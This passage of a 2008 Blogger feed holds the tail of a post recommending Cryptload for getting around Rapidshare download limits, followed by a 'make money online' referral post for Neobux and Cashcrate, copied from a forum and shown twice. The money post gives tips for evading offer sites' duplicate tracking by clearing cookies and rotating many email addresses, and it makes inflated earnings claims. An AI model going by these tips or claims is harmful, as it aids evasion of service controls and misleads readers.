getting help there. The person that patiently helped me from the beginning till the end was Apokalypser.&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;IRC Server: irc.german-elite.net&lt;br /&gt;Channel: #cryptload&lt;/p&gt;&lt;p style="TEXT-ALIGN: justify"&gt;Once you got the CLR file from Cryptload staff, copy it to Cryptload’s router folder and it’ll be included in the router list when you run Cryptload the next time. Cryptload is a perfect way to unlimited rapidshare downloading. Well, only perfect for those with dynamic IP address. It is developed by shira, bocka and apokalypser. For those with static IP adress Rapid GraB may be the best way for you. NOTE: Cryptload requires at least &lt;a class="external" href="http://www.microsoft.com/downloads/details.aspx?familyid=0856eacb-4362-4b0d-8edd-aab15c5e04f5&amp;amp;displaylang=en" target="_blank" rel="nofollow"&gt;Microsoft .NET Framework v2.0&lt;/a&gt; and above. [ &lt;a class="external" href="http://cryptload.info/download/" target="_blank" rel="nofollow"&gt;Download Cryptload&lt;/a&gt;  &lt;a class="external" href="http://cryptload.info/" target="_blank" rel="nofollow"&gt;Cryptload Website&lt;/a&gt; ]&lt;/p&gt;&lt;script type="text/javascript"&gt;&lt;!--   ch_client = "justashik4u";   ch_type = "mpu";   ch_width = "468";   ch_height = "180";   ch_non_contextual = false ? 0 : 1;   ch_sid = "default";   ch_color_bg = "white";   ch_color_border = "white";   ch_color_title = "blue";   ch_color_text = "black";   ch_default_category = "Technology";   var ch_queries = new Array( false ? '' : "*" );   var ch_selected=Math.floor((Math.random()*ch_queries.length));   ch_query = ch_queries[ch_selected];   //--&gt;&lt;br /&gt;  &lt;/script&gt;&lt;br /&gt;&lt;script src="http://scripts.chitika.net/eminimalls/mm.js" type="text/javascript"&gt;&lt;/script&gt;&lt;iframe name="ch_ad263" marginwidth="0" marginheight="0" src="http://mm.chitika.net/minimall?w=468&amp;amp;h=180&amp;amp;client=justashik4u&amp;amp;noctxt=1&amp;amp;sid=default&amp;amp;url=http%3A//www.hungry-hackers.com/2008/06/advanced-rapidshare-hacking.html&amp;amp;query=*&amp;amp;type=mpu&amp;amp;mquery=*&amp;amp;defaultcat=Technology&amp;amp;cl_border=white&amp;amp;cl_bg=white&amp;amp;cl_title=blue&amp;amp;cl_text=black&amp;amp;cb=263" frameborder="0" width="468" scrolling="no" height="180"&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-6248830149172159032?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/6248830149172159032/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/hacks-to-beat-rapidshareadvanced.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6248830149172159032'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/6248830149172159032'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/hacks-to-beat-rapidshareadvanced.html' title='Hacks to beat Rapidshare(Advanced)'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-1794869475590038431</id><published>2008-12-25T01:28:00.000-08:00</published><updated>2009-01-03T05:05:06.827-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Money'/><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><title type='text'>How to make money online</title><content type='html'>&lt;span class="smalltext"&gt;&lt;strong&gt;How to make money online &lt;/strong&gt;&lt;/span&gt;&lt;div class="post_body" id="pid_225826"&gt;Alright, A nice guide to making money online. Enjoy. &lt;img title="Cool" style="VERTICAL-ALIGN: middle" alt="Cool" src="http://www.hackforums.net/images/smilies/cool.gif" border="0" /&gt; This guide only has two websites, because these two are the BEST. the EASIEST. and the most EFFECTIVE. So bear with me.&lt;br /&gt;&lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt;. &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt; is by far the BEST PPC/PTC (Pay-Per-Click) program available. I can confirm it's legitimacy.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img100.imageshack.us/my.php?image=neobuxay1.png" target="_blank"&gt;&lt;img alt="[Image: neobuxay1.th.png]" src="http://img100.imageshack.us/img100/9374/neobuxay1.th.png" border="0" /&gt;&lt;/a&gt;&lt;a href="http://g.imageshack.us/thpix.php" target="_blank"&gt;&lt;img alt="[Image: thpix.gif]" src="http://img100.imageshack.us/images/thpix.gif" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It has a clear cut and very intuitive interface, making it very user-friendly and actually, FUN to use. (Seriously). It has popular forums, and a chat-room for you to chat in (duh) as well.&lt;br /&gt;&lt;br /&gt;You earn one cent per click, and 0.5 for a click of your referrals. There is also a few very... Interesting and unique features, jackpots. :D&lt;br /&gt;&lt;br /&gt;You pay &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt; (Either from your already made money [Balance] or from paypal/alertpay a certain amount of money to get a chance to win much more money. :P&lt;br /&gt;&lt;br /&gt;5 types of Jackpots.&lt;br /&gt;&lt;br /&gt;1) Referral Jackpot:&lt;br /&gt;prizes:&lt;br /&gt;110 referrals paid for the month,&lt;br /&gt;Price:&lt;br /&gt;2.5 dollars per ticket.&lt;br /&gt;maximum of 100 tickets. (&lt;br /&gt;&lt;br /&gt;2)Regular JackPot&lt;br /&gt;Price: $1&lt;br /&gt;Maximum tickets: 40&lt;br /&gt;Chance of winning: 5/100 for one ticket, 25/100 for five tickets, etc.&lt;br /&gt;prizes:&lt;br /&gt;1st prize: $20&lt;br /&gt;2nd prize: $12&lt;br /&gt;3rd prize: $8&lt;br /&gt;4th prize: $6&lt;br /&gt;5th prize: $4&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3) Mini Referral Jackpot&lt;br /&gt;Price: $0.25&lt;br /&gt;Chance of winning: 5/100&lt;br /&gt;Prize: 10 referrals Paid for one month. Maximum of 5 prize winners.&lt;br /&gt;&lt;br /&gt;4) Mini Regular Jackpot&lt;br /&gt;Price: $0.10&lt;br /&gt;Chance of winning: 5/100&lt;br /&gt;Prize:&lt;br /&gt;1st prize: $2&lt;br /&gt;2nd prize: $1.2&lt;br /&gt;3rd prize: $0.8&lt;br /&gt;4th prize: $0.6&lt;br /&gt;5th prize: $0.4&lt;br /&gt;&lt;br /&gt;5) MEGAJACKPOT!!&lt;br /&gt;Price: Depends, minimum $0.10&lt;br /&gt;Chance of winning: Depends&lt;br /&gt;Prize: Depends. Currently, the prize is:&lt;br /&gt;Place 1:$353.75&lt;br /&gt;Place 2:$176.87&lt;br /&gt;Place 3:$84.90&lt;br /&gt;Place 4:$56.60&lt;br /&gt;Place 5:$35.37&lt;br /&gt;With two days left. This usually manages to catch quite a lot of attention, and for good reason!&lt;br /&gt;&lt;br /&gt;Anyway, that's it for &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt;! Say good-bye for now, if you want to head on over and register (Not a bad idea. ;) )&lt;br /&gt;Click &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="FONT-SIZE: x-small"&gt;&lt;span style="COLOR: rgb(105,105,105)"&gt;http://www.ghacks.net/2007/08/11/make-money-online-with-cashcrate/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; offers a free and easy way to earn money regularly by simply filling out some surveys every day. Iâ€™m really cautious when I hear of websites that offers something in the line of â€œTake Surveys - Earn Moneyâ€ because most of them seem to really rip of the users with ultra-high payout restrictions or just a few surveys which means that it takes ages to make some decent money.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; seems to be different, at least for users from the United States, Canada and the UK. Everyone may join but the availability of surveys and offers depends on your location. If you live in Germany or India for instance you see two surveys and two offers to join a service to receive some money from it.&lt;br /&gt;&lt;br /&gt;If you join as a American you get to literally chose from hundreds of surveys and two guaranteed daily surveys that bring in $1.60 per day if you complete both each day.&lt;br /&gt;&lt;br /&gt;This means that you can earn $584 per year from just taking the daily surveys which is about $49 extra cash per month in your pockets. Minimum payout is $10 which means that you do get paid monthly if you take just the daily surveys.&lt;br /&gt;&lt;br /&gt;You do have two options to earn more money. The first is to take surveys that are offered by other companies which bring in between $0.40 to $1.50 in average with dozens of surveys available currently. I would estimate that you could at least make $50 by taking those surveys as well in the month.&lt;br /&gt;&lt;br /&gt;This would raise the monthly income to nearly $100 for just taking a few surveys. Now imagine that your girlfriend, friends or relatives sign up for the service as well.&lt;br /&gt;&lt;br /&gt;There is a second way to earn money and that is by signing up to various services. Some require just a signup and some &lt;a class="kLink" id="KonaLink0" style="POSITION: static; TEXT-DECORATION: underline! important" href="http://hackforums.net/showthread.php?tid=29317#" target="undefined"&gt;&lt;span style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: staticcolor:blue;" &gt;&lt;span class="kLink" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: static"&gt;personal &lt;/span&gt;&lt;span class="kLink" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: static"&gt;data&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; such as your email or mobile phone number to reward you with money while others offer free trial versions or purchases.&lt;br /&gt;&lt;br /&gt;Those bring in some serious cash. Want some examples ?&lt;br /&gt;&lt;br /&gt;* If you signup at eBay for free and make a bid you receive $8&lt;br /&gt;* A free trial at Vonage brings in $45&lt;br /&gt;* A free trial membership at Netflix brings in $13.50&lt;br /&gt;&lt;br /&gt;I canâ€™t calculate all the possible earnings but I would think that you could earn at least $100 from &lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; every month and even more if you take your time and evaluate all options.&lt;br /&gt;&lt;br /&gt;Last but not least some offers award points instead of cash. This means that you do get a certain amount of points after completing a survey or other offer and can use those points to buy items in the prize shop. 300 points can be traded into a $15 iTunes gift card for instance and 6000 points into a Xbox 360.&lt;br /&gt;&lt;br /&gt;Some surveys and free trials bring in around 300 points which is another great opportunity to gain something for free.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; is free to join, there are no hidden fees, a minimum payout of $10 and a monthly payout. What are you waiting for ?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; is also interesting for webmasters because it offers a two-tiered referral structure. You earn 20% / 10% by referring users to the site and an additional $3 whenever someone makes his first $10.&lt;br /&gt;&lt;br /&gt;Take a look at several checks that a user received while using &lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;, the last check shows more than $480 !&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;Tips&lt;br /&gt;&lt;br /&gt;* Visit the CashCrate Forum for a wealth of information and new monthly competitions&lt;br /&gt;* Create a new email address at a webmailer and use it exclusively for offers. This way your main email remains unknown.&lt;br /&gt;* Get a new free phone number from a company like Private Phone and use this one exclusively on CashCrate.&lt;br /&gt;* Get a Visa Gift or Prepaid Card and use it in those cases where you have to enter credit card information.&lt;br /&gt;* The best offers are the free ones that you do for free (most of the time surveys), you can sort all offers to see those at the beginning&lt;br /&gt;* Make sure you cancel the trial offers during the trial period or you will get charged afterwards.&lt;br /&gt;* Cookies: Cookies, being the number one cause of offers not confirming, simply must be cleared in between each offer. Why? Because companies track you through cookies, and for more than one offer from the same company, you need to clear them so you can be tracked again correctly, and so your offer will confirm.&lt;br /&gt;* Email Recycling: Again, companies with more than one offer on the list track you with your email address as well, and if they already have that email in their &lt;a class="kLink" id="KonaLink1" style="POSITION: static; TEXT-DECORATION: underline! important" href="http://hackforums.net/showthread.php?tid=29317#" target="undefined"&gt;&lt;span style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: staticcolor:blue;" &gt;&lt;span class="kLink" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: static"&gt;database&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;, then your offer will not confirm. Simply create 10 or more email addresses from any email provider, (The ones &lt;a id="AdBriteInlineAd_listed" style="BACKGROUND: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x center bottom; MARGIN-BOTTOM: -2px; PADDING-BOTTOM: 2px; CURSOR: pointer; COLOR: rgb(0,102,0); TEXT-DECORATION: none; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial" target="_top" name="AdBriteInlineAd_listed"&gt;listed&lt;/a&gt; above are recommended) and change them up among offers. The more email addresses you have, the less of a chance youâ€™ll submit the same email to the same company twice.&lt;br /&gt;&lt;br /&gt;Filling out Offers at &lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;* Offers with the following descriptions have easier requirements than you think!&lt;br /&gt;* â€œParticipate in the Surveyâ€, Without Questionare (Usually 60 cent or less payout): These offers only require you to provide your information, (usually on the first or second page of the â€œSurveyâ€) once it seems like the offer has taken you into an infinite loop of â€œYesâ€, â€œNoâ€, or â€œSkipâ€ offer pages, then you can exit that window, and submit the offer, and it should confirm. Even though you only have to submit your information, I always do the first 5 pages of these types of offers to be on the safe side.&lt;br /&gt;* â€œParticipate in the Surveyâ€, With Questionnare (Usually 65 cent or higher payout): These offers will ask you to fill out your information, and then require you to do a 3 to 5 minute Questionnare. You actually do have to complete this, but you only have to go until it says â€œDone!â€ or â€œCongratulations, youâ€™ve been entered!â€, even though there may still be questions below the â€œDone!â€ or Congratulations!..â€.&lt;br /&gt;* â€œComplete at least the first two pagesâ€: Obviously, you only have to fill out the first two pages. Most offers will tell you things like â€œyour almost done!â€ or â€œlast pageâ€, you do NOT have to keep going after you complete the first two pages.&lt;br /&gt;* â€œFill Out the Formâ€: These offers are usually from $0.75 to $2.00, and you actually have to fill out the pages, and like the Questionare offers, you only have to go until it says â€œDone!â€ or â€œCongratulations, youâ€™ve been entered!â€ even though there may still be questions below.&lt;br /&gt;* IMPORTANT NOTE: On all of the free offers above, in the forms, questionares, and providing information, you only have to respond to the sections that have an ASTERISK â€ * â€ next to them, all other questions/sections are optional and do not need to be filled out.&lt;br /&gt;&lt;br /&gt;The last tips were found at the CashCrate forum&lt;br /&gt;&lt;br /&gt;Sign up&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;HERE!&lt;/a&gt;&lt;br /&gt;&lt;img title="Ninja" style="VERTICAL-ALIGN: middle" alt="Ninja" src="http://www.hackforums.net/images/smilies/ninja.gif" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;I would also appreciate if you guys sign up under my referral link, basically, by clicking on one of the linked words (NeoBux/Cashcrate) This will sign you up to be my referral, which means I get a percentage of what you make. (You won't lose anything)&lt;br /&gt;This will make me more willing to post quality tutorials such as the ones here:&lt;br /&gt;&lt;a href="http://www.hackforums.net/showthread.php?tid=28651" target="_blank"&gt;http://www.hackforums.net/showthread.php?tid=28651&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Thanks! &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-1794869475590038431?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/1794869475590038431/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/how-to-make-money-online_25.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1794869475590038431'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/1794869475590038431'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/how-to-make-money-online_25.html' title='How to make money online'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4354073814992638265</id><published>2008-12-25T01:24:00.000-08:00</published><updated>2008-12-25T01:25:16.135-08:00</updated><title type='text'>How to make money online</title><content type='html'>&lt;span class="smalltext"&gt;&lt;strong&gt;How to make money online &lt;/strong&gt;&lt;/span&gt;&lt;div class="post_body" id="pid_225826"&gt;Alright, A nice guide to making money online. Enjoy. &lt;img title="Cool" style="VERTICAL-ALIGN: middle" alt="Cool" src="http://www.hackforums.net/images/smilies/cool.gif" border="0" /&gt; This guide only has two websites, because these two are the BEST. the EASIEST. and the most EFFECTIVE. So bear with me.&lt;br /&gt;&lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt;. &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt; is by far the BEST PPC/PTC (Pay-Per-Click) program available. I can confirm it's legitimacy.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img100.imageshack.us/my.php?image=neobuxay1.png" target="_blank"&gt;&lt;img alt="[Image: neobuxay1.th.png]" src="http://img100.imageshack.us/img100/9374/neobuxay1.th.png" border="0" /&gt;&lt;/a&gt;&lt;a href="http://g.imageshack.us/thpix.php" target="_blank"&gt;&lt;img alt="[Image: thpix.gif]" src="http://img100.imageshack.us/images/thpix.gif" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It has a clear cut and very intuitive interface, making it very user-friendly and actually, FUN to use. (Seriously). It has popular forums, and a chat-room for you to chat in (duh) as well.&lt;br /&gt;&lt;br /&gt;You earn one cent per click, and 0.5 for a click of your referrals. There is also a few very... Interesting and unique features, jackpots. :D&lt;br /&gt;&lt;br /&gt;You pay &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt; (Either from your already made money [Balance] or from paypal/alertpay a certain amount of money to get a chance to win much more money. :P&lt;br /&gt;&lt;br /&gt;5 types of Jackpots.&lt;br /&gt;&lt;br /&gt;1) Referral Jackpot:&lt;br /&gt;prizes:&lt;br /&gt;110 referrals paid for the month,&lt;br /&gt;Price:&lt;br /&gt;2.5 dollars per ticket.&lt;br /&gt;maximum of 100 tickets. (&lt;br /&gt;&lt;br /&gt;2)Regular JackPot&lt;br /&gt;Price: $1&lt;br /&gt;Maximum tickets: 40&lt;br /&gt;Chance of winning: 5/100 for one ticket, 25/100 for five tickets, etc.&lt;br /&gt;prizes:&lt;br /&gt;1st prize: $20&lt;br /&gt;2nd prize: $12&lt;br /&gt;3rd prize: $8&lt;br /&gt;4th prize: $6&lt;br /&gt;5th prize: $4&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3) Mini Referral Jackpot&lt;br /&gt;Price: $0.25&lt;br /&gt;Chance of winning: 5/100&lt;br /&gt;Prize: 10 referrals Paid for one month. Maximum of 5 prize winners.&lt;br /&gt;&lt;br /&gt;4) Mini Regular Jackpot&lt;br /&gt;Price: $0.10&lt;br /&gt;Chance of winning: 5/100&lt;br /&gt;Prize:&lt;br /&gt;1st prize: $2&lt;br /&gt;2nd prize: $1.2&lt;br /&gt;3rd prize: $0.8&lt;br /&gt;4th prize: $0.6&lt;br /&gt;5th prize: $0.4&lt;br /&gt;&lt;br /&gt;5) MEGAJACKPOT!!&lt;br /&gt;Price: Depends, minimum $0.10&lt;br /&gt;Chance of winning: Depends&lt;br /&gt;Prize: Depends. Currently, the prize is:&lt;br /&gt;Place 1:$353.75&lt;br /&gt;Place 2:$176.87&lt;br /&gt;Place 3:$84.90&lt;br /&gt;Place 4:$56.60&lt;br /&gt;Place 5:$35.37&lt;br /&gt;With two days left. This usually manages to catch quite a lot of attention, and for good reason!&lt;br /&gt;&lt;br /&gt;Anyway, that's it for &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Neobux&lt;/a&gt;! Say good-bye for now, if you want to head on over and register (Not a bad idea. ;) )&lt;br /&gt;Click &lt;a href="http://www.neobux.com/?r=empa7hy" target="_blank"&gt;Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="FONT-SIZE: x-small"&gt;&lt;span style="COLOR: rgb(105,105,105)"&gt;http://www.ghacks.net/2007/08/11/make-money-online-with-cashcrate/&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; offers a free and easy way to earn money regularly by simply filling out some surveys every day. Iâ€™m really cautious when I hear of websites that offers something in the line of â€œTake Surveys - Earn Moneyâ€ because most of them seem to really rip of the users with ultra-high payout restrictions or just a few surveys which means that it takes ages to make some decent money.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; seems to be different, at least for users from the United States, Canada and the UK. Everyone may join but the availability of surveys and offers depends on your location. If you live in Germany or India for instance you see two surveys and two offers to join a service to receive some money from it.&lt;br /&gt;&lt;br /&gt;If you join as a American you get to literally chose from hundreds of surveys and two guaranteed daily surveys that bring in $1.60 per day if you complete both each day.&lt;br /&gt;&lt;br /&gt;This means that you can earn $584 per year from just taking the daily surveys which is about $49 extra cash per month in your pockets. Minimum payout is $10 which means that you do get paid monthly if you take just the daily surveys.&lt;br /&gt;&lt;br /&gt;You do have two options to earn more money. The first is to take surveys that are offered by other companies which bring in between $0.40 to $1.50 in average with dozens of surveys available currently. I would estimate that you could at least make $50 by taking those surveys as well in the month.&lt;br /&gt;&lt;br /&gt;This would raise the monthly income to nearly $100 for just taking a few surveys. Now imagine that your girlfriend, friends or relatives sign up for the service as well.&lt;br /&gt;&lt;br /&gt;There is a second way to earn money and that is by signing up to various services. Some require just a signup and some &lt;a class="kLink" id="KonaLink0" style="POSITION: static; TEXT-DECORATION: underline! important" href="http://hackforums.net/showthread.php?tid=29317#" target="undefined"&gt;&lt;span style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: staticcolor:blue;" &gt;&lt;span class="kLink" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: static"&gt;personal &lt;/span&gt;&lt;span class="kLink" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: static"&gt;data&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; such as your email or mobile phone number to reward you with money while others offer free trial versions or purchases.&lt;br /&gt;&lt;br /&gt;Those bring in some serious cash. Want some examples ?&lt;br /&gt;&lt;br /&gt;* If you signup at eBay for free and make a bid you receive $8&lt;br /&gt;* A free trial at Vonage brings in $45&lt;br /&gt;* A free trial membership at Netflix brings in $13.50&lt;br /&gt;&lt;br /&gt;I canâ€™t calculate all the possible earnings but I would think that you could earn at least $100 from &lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; every month and even more if you take your time and evaluate all options.&lt;br /&gt;&lt;br /&gt;Last but not least some offers award points instead of cash. This means that you do get a certain amount of points after completing a survey or other offer and can use those points to buy items in the prize shop. 300 points can be traded into a $15 iTunes gift card for instance and 6000 points into a Xbox 360.&lt;br /&gt;&lt;br /&gt;Some surveys and free trials bring in around 300 points which is another great opportunity to gain something for free.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; is free to join, there are no hidden fees, a minimum payout of $10 and a monthly payout. What are you waiting for ?&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt; is also interesting for webmasters because it offers a two-tiered referral structure. You earn 20% / 10% by referring users to the site and an additional $3 whenever someone makes his first $10.&lt;br /&gt;&lt;br /&gt;Take a look at several checks that a user received while using &lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;, the last check shows more than $480 !&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;Tips&lt;br /&gt;&lt;br /&gt;* Visit the CashCrate Forum for a wealth of information and new monthly competitions&lt;br /&gt;* Create a new email address at a webmailer and use it exclusively for offers. This way your main email remains unknown.&lt;br /&gt;* Get a new free phone number from a company like Private Phone and use this one exclusively on CashCrate.&lt;br /&gt;* Get a Visa Gift or Prepaid Card and use it in those cases where you have to enter credit card information.&lt;br /&gt;* The best offers are the free ones that you do for free (most of the time surveys), you can sort all offers to see those at the beginning&lt;br /&gt;* Make sure you cancel the trial offers during the trial period or you will get charged afterwards.&lt;br /&gt;* Cookies: Cookies, being the number one cause of offers not confirming, simply must be cleared in between each offer. Why? Because companies track you through cookies, and for more than one offer from the same company, you need to clear them so you can be tracked again correctly, and so your offer will confirm.&lt;br /&gt;* Email Recycling: Again, companies with more than one offer on the list track you with your email address as well, and if they already have that email in their &lt;a class="kLink" id="KonaLink1" style="POSITION: static; TEXT-DECORATION: underline! important" href="http://hackforums.net/showthread.php?tid=29317#" target="undefined"&gt;&lt;span style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: staticcolor:blue;" &gt;&lt;span class="kLink" style="FONT-WEIGHT: 400; FONT-SIZE: 13px; COLOR: blue! important; FONT-FAMILY: Verdana,Arial,Sans-Serif; POSITION: static"&gt;database&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;, then your offer will not confirm. Simply create 10 or more email addresses from any email provider, (The ones &lt;a id="AdBriteInlineAd_listed" style="BACKGROUND: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x center bottom; MARGIN-BOTTOM: -2px; PADDING-BOTTOM: 2px; CURSOR: pointer; COLOR: rgb(0,102,0); TEXT-DECORATION: none; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial" target="_top" name="AdBriteInlineAd_listed"&gt;listed&lt;/a&gt; above are recommended) and change them up among offers. The more email addresses you have, the less of a chance youâ€™ll submit the same email to the same company twice.&lt;br /&gt;&lt;br /&gt;Filling out Offers at &lt;a href="http://cashcrate.com/207104" target="_blank"&gt;Cashcrate&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;* Offers with the following descriptions have easier requirements than you think!&lt;br /&gt;* â€œParticipate in the Surveyâ€, Without Questionare (Usually 60 cent or less payout): These offers only require you to provide your information, (usually on the first or second page of the â€œSurveyâ€) once it seems like the offer has taken you into an infinite loop of â€œYesâ€, â€œNoâ€, or â€œSkipâ€ offer pages, then you can exit that window, and submit the offer, and it should confirm. Even though you only have to submit your information, I always do the first 5 pages of these types of offers to be on the safe side.&lt;br /&gt;* â€œParticipate in the Surveyâ€, With Questionnare (Usually 65 cent or higher payout): These offers will ask you to fill out your information, and then require you to do a 3 to 5 minute Questionnare. You actually do have to complete this, but you only have to go until it says â€œDone!â€ or â€œCongratulations, youâ€™ve been entered!â€, even though there may still be questions below the â€œDone!â€ or Congratulations!..â€.&lt;br /&gt;* â€œComplete at least the first two pagesâ€: Obviously, you only have to fill out the first two pages. Most offers will tell you things like â€œyour almost done!â€ or â€œlast pageâ€, you do NOT have to keep going after you complete the first two pages.&lt;br /&gt;* â€œFill Out the Formâ€: These offers are usually from $0.75 to $2.00, and you actually have to fill out the pages, and like the Questionare offers, you only have to go until it says â€œDone!â€ or â€œCongratulations, youâ€™ve been entered!â€ even though there may still be questions below.&lt;br /&gt;* IMPORTANT NOTE: On all of the free offers above, in the forms, questionares, and providing information, you only have to respond to the sections that have an ASTERISK â€ * â€ next to them, all other questions/sections are optional and do not need to be filled out.&lt;br /&gt;&lt;br /&gt;The last tips were found at the CashCrate forum&lt;br /&gt;&lt;br /&gt;Sign up&lt;br /&gt;&lt;a href="http://cashcrate.com/207104" target="_blank"&gt;HERE!&lt;/a&gt;&lt;br /&gt;&lt;img title="Ninja" style="VERTICAL-ALIGN: middle" alt="Ninja" 